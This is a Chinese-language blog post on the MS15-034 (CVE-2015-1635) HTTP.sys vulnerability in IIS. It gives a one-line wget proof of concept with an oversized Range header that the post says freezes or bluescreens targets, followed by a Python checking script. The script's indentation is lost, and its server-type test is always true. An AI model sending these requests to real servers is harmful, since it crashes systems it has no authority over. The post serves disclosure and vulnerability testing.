HTTP.sys遠程執行代碼漏洞(CVE-2015-1635,MS15-034)
遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。
成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。
https://technet.microsoft.com/zh-cn/library/security/MS15-034
漏洞出來了POC,測試如下:
影響版本:
windows 2008 R2
windows sever 2012
windows 7
windows 8 8.1
安裝IIS6.0以上。 (IIS version > 6.0)
HTTP.sys不懂其他地方用不用,所以暫時只了解影響WEB服務器。
測試POC:
系統必假死或者藍屏:
wget --header="Range: bytes=18-18446744073709551615" http://192.168.200.49/welcome.png
https://github.com/yanyueoo7/TestOne/blob/master/CVE-2015-1635.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#date 2015/04/20
#The IIS Vul (CVE-2015-1635,MS15-034)Check Script.
#HTTP.sys Remote Code Execute.
import sys
import requests
def main():
ip_Str = sys.argv[1]
Check_CVE_2015_1635(ip_Str)
def Check_CVE_2015_1635(Ip_Str):
if Ip_Str:
Server_Tag = ['Microsoft-HTTP','Microsoft-IIS']
Tmp_Req_Url = str(''.join(['http://',Ip_Str]))
Request_Tmp = requests.get(Tmp_Req_Url)
remote_server = Request_Tmp.headers[ 'server']
if (tmp_tag in remote_server for tmp_tag in Server_Tag):
print("[+] Web Service Is " + remote_server)
MS15_034_Execute(Tmp_Req_Url)
else:
print("[+] Web Service Is Not IIS\n[+] May Be " + remote_server)
def MS15_034_Execute(domain):
print("[+] Start Checking...")
Req_headers = {'Host': 'stuff','Range': 'bytes=0-18446744073709551615'}
Request = requests.get(domain, headers=Req_headers)
if 'Requested Range Not Satisfiable' in Request.content:
print("[+] The HTTP.sys remote code execution vulnerability Is Exists!")
elif 'The request has an invalid header name' in Request.content:
print("[+] The vulnerability has been fixed!")
else:
print("[+] The IIS service was unable to display the vulnerability exists, the need for manual testing!")
if __name__ == '__main__':
main()